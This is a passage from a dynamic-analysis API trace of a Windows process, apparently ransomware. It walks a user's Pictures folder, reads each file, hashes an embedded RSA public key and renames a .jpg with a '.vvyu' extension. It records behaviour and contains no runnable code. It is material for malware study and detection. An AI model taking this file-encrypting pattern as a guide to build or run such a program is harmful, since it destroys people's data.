nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0191.023] CloseHandle (hObject=0x584) returned 1 [0191.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0191.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0191.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0191.025] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\NE4TCssID4OKfQf7Z.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\ne4tcssid4okfqf7z.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\NE4TCssID4OKfQf7Z.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ne4tcssid4okfqf7z.jpg.vvyu")) returned 1 [0191.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.026] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0191.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0191.029] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73af21c0, ftCreationTime.dwHighDateTime=0x1d8a4db, ftLastAccessTime.dwLowDateTime=0x198b8ef0, ftLastAccessTime.dwHighDateTime=0x1d8a5c0, ftLastWriteTime.dwLowDateTime=0x198b8ef0, ftLastWriteTime.dwHighDateTime=0x1d8a5c0, nFileSizeHigh=0x0, nFileSizeLow=0x280c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OM3A-O87OLj.gif", cAlternateFileName="OM3A-O~1.GIF")) returned 1 [0191.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af35d0 [0191.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0191.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af35d0 | out: hHeap=0x2c0000) returned 1 [0191.029] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\OM3A-O87OLj.gif") returned=".gif" [0191.030] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\OM3A-O87OLj.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\om3a-o87olj.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0191.030] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=10252) returned 1 [0191.030] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0191.034] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x27e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.034] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0191.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.037] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.037] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x280c, lpOverlapped=0x0) returned 1 [0191.038] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0191.038] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.038] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.038] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0191.039] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0191.039] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0191.039] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0191.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0191.039] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0191.039] GetLastError () returned 0x0 [0191.039] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0191.039] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0191.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.040] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0191.040] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0191.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.040] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0191.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2810) returned 0x2ae6ea0 [0191.040] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0191.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0191.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0191.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0191.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af35d0 [0191.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f60 [0191.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3618 [0191.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f00 [0191.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f90 [0191.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ff0 [0191.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fa8 [0191.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0191.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0191.041] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0191.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0191.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f90 | out: hHeap=0x2c0000) returned 1 [0191.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fa8 | out: hHeap=0x2c0000) returned 1 [0191.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ff0 | out: hHeap=0x2c0000) returned 1 [0191.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0191.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ff0 [0191.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0191.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5fa8 [0191.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0191.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae5f90 [0191.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0191.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0191.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0191.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0191.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0191.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0191.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0191.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0191.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fa8 | out: hHeap=0x2c0000) returned 1 [0191.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f90 | out: hHeap=0x2c0000) returned 1 [0191.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0191.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0191.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ff0 | out: hHeap=0x2c0000) returned 1 [0191.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0191.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0191.043] GetCurrentThreadId () returned 0x5d8 [0191.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0191.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae5658 [0191.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0191.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0191.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0191.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0191.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0191.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0191.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.044] GetCurrentThreadId () returned 0x5d8 [0191.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0191.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0191.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0191.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0191.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0191.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0191.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0191.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ff0 [0191.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0191.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0191.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0191.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0191.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0191.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0191.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0191.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f90 [0191.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0191.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0191.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0191.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0191.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0191.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0191.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5fa8 [0191.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0191.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0191.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0191.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f48 [0191.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0191.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6008 [0191.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0191.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fd8 [0191.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fc0 [0191.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0191.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6020 [0191.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fc0 | out: hHeap=0x2c0000) returned 1 [0191.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5fc0 [0191.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fd8 | out: hHeap=0x2c0000) returned 1 [0191.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0191.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0191.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0191.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0191.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0191.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f90 | out: hHeap=0x2c0000) returned 1 [0191.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f90 [0191.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0191.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0191.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ff0 | out: hHeap=0x2c0000) returned 1 [0191.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0191.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6020 | out: hHeap=0x2c0000) returned 1 [0191.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0191.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0191.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0191.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0191.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f90 | out: hHeap=0x2c0000) returned 1 [0191.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0191.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0191.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0191.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0191.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0191.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0191.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0191.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0191.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0191.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0191.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0191.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fc0 | out: hHeap=0x2c0000) returned 1 [0191.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6008 | out: hHeap=0x2c0000) returned 1 [0191.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0191.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fa8 | out: hHeap=0x2c0000) returned 1 [0191.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f48 | out: hHeap=0x2c0000) returned 1 [0191.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0191.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0191.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0191.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f00 | out: hHeap=0x2c0000) returned 1 [0191.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3618 | out: hHeap=0x2c0000) returned 1 [0191.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0191.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0191.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0191.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0191.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0191.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0191.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0191.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) 